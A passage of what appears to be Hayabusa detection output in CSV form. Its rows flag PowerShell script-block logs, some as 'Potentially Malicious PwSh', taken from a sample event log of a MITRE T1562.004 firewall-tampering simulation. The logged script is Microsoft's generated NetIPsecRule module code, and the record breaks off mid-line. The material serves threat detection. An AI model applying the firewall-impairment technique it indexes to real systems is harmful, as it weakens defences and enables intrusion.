[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains 